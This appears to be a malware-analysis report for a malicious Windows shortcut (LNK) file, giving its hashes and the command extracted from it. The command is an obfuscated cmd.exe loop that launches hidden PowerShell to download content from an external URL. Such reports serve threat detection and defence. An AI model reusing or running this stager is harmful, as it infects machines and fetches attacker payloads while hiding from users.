Malicious
Malicious

57cea88352bb5f7a0484982965e64dc8

LNK File
|
MD5: 57cea88352bb5f7a0484982965e64dc8
|
Size: 1.46 KB
|
application/x-ms-shortcut

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
57cea88352bb5f7a0484982965e64dc8
Sha1
44a44b4a6822ee30207408367382431e07eed1cd
Sha256
f1da6a8de41fde7fc6ee7ff3b58d856cbf28823ad626c06aa465cd551b67796e
Sha384
a4ee0f865b9f924ce448b976043945129e8a9811f510c1c40472807e0dd5ca32d5cdc92df00d2cdd8fa218344c21da14
Sha512
321181f7a8c30b559aec3240912bc0e6cd38d9d1f937f5f685a425e429b98bf240c094cb01c3ce9274d8d56d55dbb974627bc895b8cd7ba818c21de2d7027133
SSDeep
24:8RvuJH3flBVMUHbAZP5J+/5+fYXDInlFaDvmEidPteicDSMhsLlaZ54aabWlYqmR:8OKyMZxw83BhPtTJMhgq4aaw
TLSH
BA3190141BE91735D2F6CF3A687AD7508A31BD16F8B68F5D11A4465C1C04710AC36F7E
File Structure
57cea88352bb5f7a0484982965e64dc8
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /c FOR /f "tokens=4 delims=s\" %g in ('set^|findstr PSM') do cmd /c for /f "tokens=*" %j in ("%g -WindowStyle Hidden -c (New-Object Net.WebClient).DownloadString('https://1cbit-dev.com/equipment/modules/x64/setup.html')") do %g -WindowStyle Hidden "%j"
57cea88352bb5f7a0484982965e64dc8 (1.46 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙